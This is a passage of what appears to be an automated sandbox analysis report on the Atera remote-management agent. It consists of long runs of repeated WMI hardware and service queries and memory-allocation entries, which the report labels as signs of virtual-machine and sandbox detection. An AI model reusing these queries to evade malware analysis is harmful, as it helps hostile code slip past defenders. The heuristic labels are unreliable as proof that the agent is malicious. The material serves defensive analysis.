                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID=&quot;\\\\.\\PHYSICALDRIVE0&quot;} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent=&quot;Win32_DiskDrive.DeviceID=\&quot;\\\\\\\\.\\\\PHYSICALDRIVE0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID=&quot;\\\\.\\PHYSICALDRIVE0&quot;} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent=&quot;Win32_DiskDrive.DeviceID=\&quot;\\\\\\\\.\\\\PHYSICALDRIVE0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID=&quot;\\\\.\\PHYSICALDRIVE0&quot;} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent=&quot;Win32_DiskDrive.DeviceID=\&quot;\\\\\\\\.\\\\PHYSICALDRIVE0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID=&quot;\\\\.\\PHYSICALDRIVE0&quot;} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent=&quot;Win32_DiskDrive.DeviceID=\&quot;\\\\\\\\.\\\\PHYSICALDRIVE0\&quot;&quot;
                                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PhysicalAdapter,Name,PNPDeviceID from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PhysicalAdapter,Name,PNPDeviceID from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSMBios_RawSMBiosTables
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSMBios_RawSMBiosTables
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSMBios_RawSMBiosTables
                                Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name=&apos;MSExchangeIS&apos; OR DisplayName=&apos;MSExchangeIS&apos;
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name=&apos;MSExchangeIS&apos; OR DisplayName=&apos;MSExchangeIS&apos;
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name=&apos;MSExchangeIS&apos; OR DisplayName=&apos;MSExchangeIS&apos;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Name,DisplayName,Description,State from Win32_Service
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name=&apos;MSExchangeIS&apos; OR DisplayName=&apos;MSExchangeIS&apos;
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name=&apos;MSExchangeIS&apos; OR DisplayName=&apos;MSExchangeIS&apos;
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name=&apos;MSExchangeIS&apos; OR DisplayName=&apos;MSExchangeIS&apos;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Name,DisplayName,Description,State from Win32_Service
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name=&apos;MSExchangeIS&apos; OR DisplayName=&apos;MSExchangeIS&apos;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name=&apos;MSExchangeIS&apos; OR DisplayName=&apos;MSExchangeIS&apos;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name=&apos;MSExchangeIS&apos; OR DisplayName=&apos;MSExchangeIS&apos;
                                Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_SoundDevice
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_SoundDevice
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 1E7269C0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 1E7404A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 23476CE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 23476D70000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 1FD412A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 1FD59970000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 26AD1BD0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 26AEA3B0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 1A113D40000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 1A12C540000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 1A881280000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 1A899950000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 246BB020000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 246D3670000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeMemory allocated: 27055320000 memory reserve | memory write watch
